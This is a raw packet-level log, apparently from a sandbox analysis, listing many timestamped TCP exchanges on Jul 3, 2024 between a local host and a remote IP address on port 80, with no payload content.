Jul 3, 2024 18:08:39.691152096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691163063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691204071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691265106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691299915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691320896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691330910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691366911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691421032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691432953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691443920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691456079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691462040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691497087 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691546917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691586018 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691589117 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691632032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691663027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691674948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691688061 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691699028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691699028 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691720963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691747904 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691818953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691829920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691839933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691850901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691852093 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691862106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.691871881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.691899061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692023039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692033052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692044020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692054033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692059994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692065954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692081928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692109108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692277908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692292929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692303896 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692317963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692321062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692332983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692342997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692346096 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692353964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692365885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692375898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692375898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692384005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692394018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692400932 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692406893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692414999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692430019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692456007 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692632914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692668915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692799091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692816973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692821980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692831993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692843914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692854881 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692856073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692866087 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692877054 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692882061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692887068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692898035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692902088 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692909956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.692922115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.692939997 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693108082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693147898 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693284988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693296909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693306923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693319082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693325996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693330050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693341970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693352938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693353891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693363905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693371058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693375111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693386078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693389893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693398952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693409920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693413019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693420887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693444967 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693459988 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693692923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693705082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693721056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693732023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693736076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693767071 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693842888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693854094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693864107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693876028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693883896 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693886042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693900108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693900108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693911076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693921089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693924904 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693933964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693944931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.693964005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.693974972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694509983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694520950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694530964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694541931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694550037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694552898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694566965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694576979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694577932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694588900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694600105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694611073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694611073 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694644928 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694655895 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694667101 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694669008 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694669008 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694683075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694695950 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694695950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694708109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694719076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694730043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694730997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694756985 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694794893 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.694973946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694983959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.694993019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695003986 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695014000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695018053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.695024014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695036888 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.695060968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695065022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.695071936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695082903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695092916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695094109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.695103884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695116043 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695122957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.695127010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695137024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.695153952 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.695171118 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.779856920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.779903889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.779916048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.779927969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.779939890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.779939890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.779978037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.779989958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780010939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780010939 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780026913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780039072 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780050993 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780060053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780060053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780092955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780092955 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780185938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780198097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780209064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780220032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780232906 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780360937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780371904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780383110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780395031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780399084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780399084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780406952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780442953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780442953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780512094 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780632973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780646086 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780664921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780670881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780670881 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780677080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780689955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780703068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780704975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780704975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780715942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780755043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780755043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780870914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780881882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780894041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.780919075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.780919075 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781012058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781075954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781089067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781099081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781111002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781122923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781133890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781137943 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781138897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781147957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781160116 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781172037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781183004 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781194925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781200886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781200886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781244993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781244993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781425953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781438112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781449080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781460047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781461954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781491041 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781519890 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781531096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781543016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781553984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781564951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781574011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781575918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781588078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781598091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781599998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781599998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781610966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781620979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781632900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.781642914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781642914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781682968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.781682968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782010078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782021999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782032967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782043934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782047033 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782054901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782064915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782083035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782094002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782098055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782098055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782105923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782118082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782130003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782140017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782145977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782145977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782150984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782164097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782179117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782222986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782654047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782665968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782677889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782687902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782699108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782704115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782704115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782710075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782726049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782737970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782748938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782752037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782752037 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782761097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782773018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782783031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.782785892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782785892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.782850027 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783152103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783164978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783175945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783185959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783196926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783206940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783206940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783207893 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783220053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783231020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783242941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783252001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783252954 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783260107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783272028 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783282995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783294916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783299923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783299923 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783308983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783320904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783334017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783344984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783344984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783345938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783358097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783369064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783380032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783390999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:39.783391953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783391953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:39.783405066 CEST	80	49710	85.28.47.4	192.168.2.6
